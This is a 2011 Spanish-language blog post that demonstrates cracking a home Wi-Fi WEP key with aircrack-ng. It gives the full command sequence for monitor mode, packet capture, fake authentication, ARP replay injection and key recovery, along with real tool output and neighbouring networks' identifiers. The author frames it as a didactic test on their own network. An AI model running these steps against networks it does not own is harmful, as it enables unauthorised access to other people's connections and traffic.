Es por todo esto que hago enfasis en capacitar(platicar) a los encargados (familiares) de dar información para que puedan distinguir que información se puede compartir y cual no: para que así  fortalezcamos la seguridad y no sea tan fácil caer en estos ataques.  En todo esto (como en la seguridad informática)  el sentido común juega un papel muy importante.

Por eso es que digo que la seguridad empieza en casa.
Hasta la próxima!
Saludos seguros 0=¬)          

febrero 14, 2011

Probando la Seguridad de las Claves WEP

Por petición añeja  de @MarcoIvanVargas y el interés de @Calvarez1976 en el tema, el día de hoy expondre como es que la encriptación WEP para redes inalambricas (qué es la más usada en nuestro país actualmente) está ya herida de muerte y será necesario escalar al siguiente peldaño en la escalera de la encripctación de redes inalambricas. Afortunadamente no vivimos (espero) en un barrio en el que todos sean hakers(o peor hackers wannabe) y tener almenos una Encriptación WEP nos ayuda a que no todos en la calle se cuelgue de nuestra conexión.

Mi convicción personal me obliga a decirles que lo aquí expuesto no es más que una demostración de como las claves WEP son débiles este artículo no tiene la finalidad de enseñar a "romper" la seguridad de ninguna otra red, es con fines didacticos y no me hago responsable de lo ustedes puedan hacer con dicha información o pérdida de información ( e incluso de la libertad XD )

Lo primero que necesitamos es tener a la mano las herramientas de "aircrack". En esta explicación utilizaremos la versión para Linux pues aunque hay versión para windows, ésta se ve limitada por no poder realizar tareas como inyección de paquetes y otros trucos que llevaremos a cabo. No voy a explicar muchos datos técnicos para no facilitarle tanto las cosas a usuarios que lleguen aquí con quien sabe que intenciones ¬¬
En otros casos haré enlaces a la wikipedia para la definición de algunos terminos.

Doy por hecho que tenemos tarjeta de red inalambrica y que además soporta el modo promiscuo(monitoreo) de conexión y que estamos familiarizados con la ventana de terminal en linux.

Teniendo el aircrack instalado en Linux  (podemos utilizar una distribución como backTrack que ya tiene todo lo necesario para estos menesteres)
Manos a la Obra:

Primero: airmon-ng start wlan2

Pondremos en modo promiscuo (monitoreo) la tarjeta de red en mi caso se llama Wlan2

Tecleamos en la línea de comandos: airmong-ng start wlan2

lo que regresa:
root@ubuntu:~# airmon-ng start wlan2

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
853 avahi-daemon
855 avahi-daemon
863 NetworkManager
903 wpa_supplicant
9318 dhclient


Interface Chipset  Driver
wlan2  RTL8187  rtl8187 - [phy0]
    (monitor mode enabled on mon0) <--- monitor ON

root@ubuntu:~#

Si no te sale (monitor mode enabled on mon0)  no sigas leyendo que tu tarjeta no soporta el modo de monitor :P
en este punto el nombre de la interfaz que usaremos en el resto de los pasos será mon0

SEGUNDO: airodump-ng mon0 identificar la red que vamos a probar

root@ubuntu:~# airodump-ng mon0
 CH  5 ][ Elapsed: 12 s ][ 2011-01-26 17:56                                       
                                                                                  
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                     
                                                                                                    
 00:26:44:29:CF:D3  -28        6        0    0   1  54   WEP  WEP         INFINITUM1C04AA
 F0:7B:CB:11:07:24  -45        2        0    0   9  54e  WEP  WEP         Telecable1

 00:25:68:06:FB:A8  -56        5        0    0   6  54   WEP  WEP         INFINITUM311a
 00:24:17:3D:51:E9  -60        2        8    0   9  54   WEP  WEP         MOTOROLA

 00:23:51:71:03:B1  -60        5        0    0   1  54 . WEP  WEP         INFINITUM0351
 00:1F:B3:E5:49:81  -62        4        0    0   3  54 . WEP  WEP         INFINITUM1079
 00:21:7C:74:46:31  -65        3        0    0   7  54 . WEP  WEP         ISSSEA

 00:21:7C:68:EE:F9  -67        2        0    0   1  54 . WEP  WEP         INFINITUM3639
 00:25:68:07:02:08  -68        3        0    0   2  54   WEP  WEP         INFINITUMda5c

root@ubuntu:~#

Aquí podemos ver datos importantes
  • PWR: es el nivel(poder) de la señal de radio
  • CH: channerl, el canal de transmisión del AccessPoint
  • ESSID: es el nombre de la red en cuestión
  • BSSID: que es la MACaddress del dispositivo 
Para este ejemplo tomaremos la red INFINITUM311a pues es nuestra y no afectamos a nadie

TERCERO: airodump-ng mon0 --ivs -w INFINITUM311a -c6
ahora nos conectaremos al dispositivo que seleccionado en el canal en el que transmite

root@ubuntu:~# airodump-ng mon0 --ivs -w INFINITUM311a -c6 
[CH  6 ][ Elapsed: 1 min ][ 2011-01-26 18:09
                                                                                                                                               BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER      ESSID
00:26:44:29:CF:D3  -40   0       15        0    0   1  54   WEP  WEP         INFINITUM1C04AA
00:25:68:06:FB:A8  -54  50      758        1    0   6  54   WEP  WEP         INFINITUM311a
F0:7B:CB:11:07:24  -61   7       56        0    0   9  54e  WEP  WEP         Telecable1
00:24:17:3D:51:E9  -63   0        8        6    0   9  54   WEP  WEP         Motorola
64:16:F0:33:40:5D  -68   0        4        0    0  11  54   WEP  WEP         INFINITUM93bd
64:16:F0:BB:5D:7A  -67  54      536        0    0   6  54   WEP  WEP         INFINITUM1a49
00:24:17:B9:26:97  -69  37      413        2    0   6  54   WEP  WEP         INFINITUM69042B         00:23:51:71:03:B1  -65   0        1        0    0   1  54 . WEP  WEP         INFINITUM0351
00:21:7C:68:EE:F9  -66   0        2        1    0   1  54 . WEP  WEP         INFINITUM3639

-- Abrir una nueva terminal y hacer lor lo siguiente:

Si la red en cuestión sólo está siendo utilizada por nosotros entonces debemos asociar a un cliente más para poder relizar la captura de paquetes que viajan por el aire si hubiera mas usuarios en la red podemos saltarnos este paso:

CUARTO: aireplay-ng mon0 -1 0 -e INFINITUM311a -a 00:25:68:06:FB:A8

root@ubuntu:~# aireplay-ng mon0 -1 0 -e INFINITUM311a -a 00:25:68:06:FB:A8
No source MAC (-h) specified. Using the device MAC (00:C0:CA:3A:3D:53)
18:13:53  Waiting for beacon frame (BSSID: 00:25:68:06:FB:A8) on channel 6
18:13:53  Sending Authentication Request (Open System) [ACK]
18:13:53  Authentication successful
18:13:53  Sending Association Request [ACK]
18:13:53  Association successful :-) (AID: 1)root@ubuntu:~#

Si en este punto no sale Association Successfu es porque el AccessPoint tiene un filtrado de MACaddress lo que es una buena práctica para proteger la red inalambrica, lo trite aquí es que la mayoría de estos dispositivos se quedan con la configuración predeterminada y no cuentan con filtrado por MAC

Una vez que hemos conseguido la asociación (o en el caso de haber ya un cliente legítimo conectado),

relanzamos aireplay cambiando alguno de los parámetros.
Necesitamos cambiar el primer parámetro a “-3” que corresponde al ataque de inyección automático y pon atención en el parámetro -r que le indica al comando que debe guardar la captura de paquetes en el archivo llamado "archivo.cap"


QUINTO: aireplay-ng mon0 -3 -e INFINITUM311a -b 00:25:68:06:FB:A8 -r archivo.cap 

root@ubuntu:~# aireplay-ng mon0 -3 -e INFINITUM311a -b 00:25:68:06:FB:A8 -r archivo.cap

No source MAC (-h) specified. Using the device MAC (00:C0:CA:3A:3D:53)
18:22:26  Waiting for beacon frame (BSSID: 00:25:68:06:FB:A8) on channel 6
Saving ARP requests in replay_arp-0126-182226.cap
You should also start airodump-ng to capture replies.
Read 3707 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

Nota que la linea donde dice:
Read 3707 packets (got 0 ARP requests and 4 ACKs), sent 0 packets...(0 pps)

irá cambiando aquí el siguiente salto:
68707 packets (got 0 ARP requests and 746 ACKs), sent 0 packets...(500 pps)

En este punto lo que debemos hacer es esperar, esperar y esperar, nuestro trabajo aquí es capturar la mayor cantidad de paquetes... ¿cuantos? entre más mejor.

Aquí pudo hacer una serie de anotaciones en base a mi experiencia:
  • Les puedo decir que entre más cerca estes de la señal, menos tiempo tardarás en realizar la captura,
  • si por alguna situación se detiene la captura de paquetes puedes reiniciarla desde el paso 5°, el parametro -r permite agregar al archivo más paquetes de captura y no comienza de nuevo.
  • La paciencia es un don que todo especialista de seguridad debe tener. XD
Después de estar algo así como 20 minutos capturando la señal (estamos en la habitación de al lado por eso la captura es relativamente rápida) Estamos listos para ejecutar el último comando, el que permitirá descubrir la clave WEP de la red inalambrica.

SEXTO: aircrack –x -0 nombre_archivo_captura


El parámetro –x evita que se realice “fuerza bruta” sobre los 2 últimos bytes, lo que acelerará el proceso al probar menos claves
El parámetro -0  en realidad no sirve para nada, lo único que hace es poner aircrack en un color similar al de la película “Matrix”. XD

Finalmente el último parametro es el nombre del archivo de las capturas realizadas con airoduimp. en nuestro caso "archivo.cap"
abrimos otra terminal para lanzar el comando aircrack
aquí  la salida del comando:

root@ubuntu:~# aircrack –x -0 archivo.cap

                                           Aircrack-ng 1.0                           
                                [00:01:57] Tested 8 keys (got 518916 IVs)  
KB    depth   byte(vote)   
0    0/  1   02(26880) 85(25344) 33(24832) 1B(24320) F8(24064) 38(23552) 98(23552)
1    0/  1   78(28416) 1C(24320) 78(24064) C2(24064) CE(23808) 1A(23552) 21(23040)
2    0/  1   84(27904) 71(24832) 7E(24832) 06(23808) E2(23808) 1C(23296) A5(23296)
3    0/  2   58(26368) BD(26368) 49(24064) 68(24064) D8(24064) 1C(23040) 9D(23040)
4    0/  4   5F(24832) 54(24832) F9(24576) 9C(23808) 0D(23552) A4(23552) B0(23552)

KEY FOUND! [ 02:78:84:58:46 ]  Decrypted correctly:100%

root@ubuntu:~#

La clave encontrada
0278845846

Necesitarás aproximadamente 300.000 IVs para una WEP de 64 bytes y 1.000.000 de IVs para una clave de 128 bytes. A veces puedes necesitar muchos mas.

Debes lanzar Aircrack cuando tengas unos  300.000 IVs

Puedesn lanzar aircrack mientras continuas al mismo tiempo la captura de paquetes con airodump.
Si falla la desenciptación de la clave puedes esperar unos minutos más y volver a lanzar el aircrack (recuerda que esto es de paciencia)

No te olvides de situarte en el directorio que contiene el archivo .cap, o indica la ruta completa del mismo en el comando aircrack.

Esta prueba se realizo aproximadamente en 40minutos.

Lo que nos permite demostrar que la encriptación WEP es relativamente debil y sencilla de romper por algún usuario malintencionado (que es el punto de este post)

Usar encriptación WPA y WPA2 es un poco más seguro (si un poco,pues también se puede romper aunque tarda más tiempo)

y lo mejor que podemos hacer como usuarios domesticos es usar filtrado por dirección MAC en nuestros AccessPoints.

Y como el aparato mas seguro del mundo es el que está apagado.... apaga tu AccessPoint si no usas tu conexión o no estarás en casa.

Espero que les sea útil este post para fortalecer la seguridad de sus conexiones.

Para profundizar más en el tema: Google es tu amigo y la página oficial del proyecto Aircrack

Saludos Seguros 0=¬)